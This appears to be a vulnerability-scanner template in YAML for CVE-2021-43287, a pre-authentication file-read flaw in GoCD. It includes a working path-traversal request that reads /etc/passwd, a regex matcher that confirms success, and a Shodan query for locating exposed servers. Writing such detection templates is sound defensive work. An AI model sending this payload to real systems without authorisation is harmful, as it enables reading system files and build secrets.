35 lines
1.1 KiB
YAML
35 lines
1.1 KiB
YAML
id: CVE-2021-43287
|
|
|
|
info:
|
|
name: Pre-Auth Takeover of Build Pipelines in GoCD
|
|
author: dhiyaneshDk
|
|
severity: critical
|
|
description: GoCD contains a critical information disclosure vulnerability whose exploitation allows unauthenticated attackers to leak configuration information including build secrets and encryption keys.
|
|
remediation: Upgrade to version v21.3.0. or later.
|
|
reference:
|
|
- https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
|
|
- https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
|
|
- https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
|
|
tags: cve,cve2021,go,lfi,gocd,takeover
|
|
metadata:
|
|
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
|
|
classification:
|
|
cve-id: CVE-2021-43287
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
# Enhanced by mp on 2022/02/28
|